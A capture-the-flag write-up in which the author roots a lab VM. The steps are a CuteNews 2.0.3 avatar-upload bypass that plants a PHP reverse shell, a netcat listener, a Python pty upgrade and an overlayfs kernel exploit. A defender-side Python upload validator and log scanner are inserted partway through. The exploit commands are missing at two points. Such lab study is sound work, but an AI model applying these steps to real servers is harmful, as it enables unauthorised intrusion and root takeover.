This VM is a really easy boot2root challenge. I pwned it in 5 minutes, let’s start!
I scanned all available services with nmap:
nmap 192.168.1.20 -sV
The output is:
Starting Nmap 7.25BETA2 ( https://nmap.org ) at 2016-09-15 19:09 CEST
Nmap scan report for 192.168.1.20
Host is up (0.0021s latency).
Not shown: 999 closed ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.29 seconds
So there is only a website here. I opened it and I had a login form in front of me. The server is running CuteNews v.2.0.3 and after some research I found an arbitrary file upload vulnerability here. So I just registered a new user (testuser in this case) and I logged in. Then I clicked on “Personal Options”. Now I started Burp Suite and I activated the proxy interception. Then I downloaded this shell and I edited the first 2 lines with my local IP and listening port. Then I renamed it with a .jpg extension, I clicked “Browse…”, I selected the file and I pressed “Save Changes”. Now I edited the POST request in Burp Suite, changing the extension back to .php, I forwarded the request and the file was uploaded! Now I started listening locally:
nc -lvp 1234
Now I browsed to http://192.168.1.20/uploads/avatar_testuser_php-reverse-shell.php and I got the reverse shell, but without a TTY. To get one I just used python:
python -c 'import pty; pty.spawn("/bin/bash")'
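The upload bug above boils down to the server trusting the filename in the POST request. As an added example (my own code, not part of CuteNews or of the original write-up), here are the two defender-side checks I would want: a server-side validator that accepts an avatar only when the extension is on an image allowlist and the file content actually starts with that image type's magic bytes, and a small Apache access-log scan that flags any request fetching a PHP file from the uploads directory. The log lines are constructed samples modelled on the request made in this walkthrough; the uploads path and the avatar naming scheme are assumed from what the page shows.

```python
"""Defender-side checks for an avatar-upload feature.

Added example, not CuteNews code. Assumes avatars are stored under
"/uploads/" and named "avatar_<user>_<original name>" as seen above.
"""
import os
import re

# Allowed image extensions mapped to the magic bytes the file must begin with.
ALLOWED_TYPES = {
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".gif": (b"GIF87a", b"GIF89a"),
}


def is_safe_avatar_upload(filename: str, data: bytes) -> bool:
    """Accept only single-extension image names whose bytes match the extension.

    The extension sent by the client is never trusted on its own: the file
    content must also start with the magic bytes of that image format, which is
    what catches a PHP file renamed (or re-renamed in a proxy) to .php/.jpg.
    """
    base = os.path.basename(filename)          # drop any directory component
    name, ext = os.path.splitext(base)
    ext = ext.lower()
    if "." in name or ext not in ALLOWED_TYPES:  # rejects "shell.php.jpg" and ".php"
        return False
    return any(data.startswith(magic) for magic in ALLOWED_TYPES[ext])


# Matches the request part of a combined-format Apache access log line.
LOG_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+" (?P<status>\d{3})')
# Extensions Apache would hand to the PHP interpreter.
SERVER_CODE_EXT = re.compile(r"\.ph(p\d?|tml|ar)$", re.IGNORECASE)


def find_suspicious_uploads(log_lines):
    """Return (path, status) for every request that fetches server-side code from /uploads/."""
    hits = []
    for line in log_lines:
        m = LOG_RE.search(line)
        if not m:
            continue
        path = m.group("path").split("?", 1)[0]  # ignore the query string
        if path.startswith("/uploads/") and SERVER_CODE_EXT.search(path):
            hits.append((path, int(m.group("status"))))
    return hits


# Constructed sample log lines (not from the original page).
SAMPLE_LOG = [
    '192.168.1.5 - - [15/Sep/2016:19:19:40 +0200] "POST /index.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
    '192.168.1.5 - - [15/Sep/2016:19:19:55 +0200] "GET /uploads/avatar_testuser_photo.jpg HTTP/1.1" 200 4821 "-" "Mozilla/5.0"',
    '192.168.1.5 - - [15/Sep/2016:19:20:01 +0200] "GET /uploads/avatar_testuser_php-reverse-shell.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    jpeg = b"\xff\xd8\xff\xe0" + b"\x00" * 16
    print("jpg with jpeg bytes:", is_safe_avatar_upload("avatar.jpg", jpeg))
    print("php renamed to jpg:", is_safe_avatar_upload("avatar.jpg", b"<?php system($_GET['c']); ?>"))
    print("php extension:", is_safe_avatar_upload("avatar.php", jpeg))
    print("suspicious requests:", find_suspicious_uploads(SAMPLE_LOG))
```

The validator deliberately refuses any name with more than one dot, so "photo.php.jpg" is rejected along with plain ".php"; a stricter deployment would also rename the stored file to a server-generated name and serve the uploads directory with PHP execution disabled. The log scan is the detection side of the same issue: a 200 response for a .php file under /uploads/ is exactly the request that gave the reverse shell above.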
Now I need to escalate privileges. I started by checking the kernel version:
uname -a
The output is:
Linux simple 3.16.0-30-generic #40~14.04.1-Ubuntu SMP Thu Jan 15 17:45:15 UTC 2015 i686 i686 i686 GNU/Linux
I checked the kernel version online and I discovered that it was vulnerable to the overlayfs exploit. So I browsed to /tmp and I typed:
Then I gave it execution permissions:
chmod +x ofs_32
And now I just executed it:
I got a shell as root! I re-spawned a TTY shell with python, I browsed to /root, I listed the files and I found flag.txt. I just opened it:
U wyn teh Interwebs!!1eleven11!!1! Hack the planet!
The VM is rooted and completed!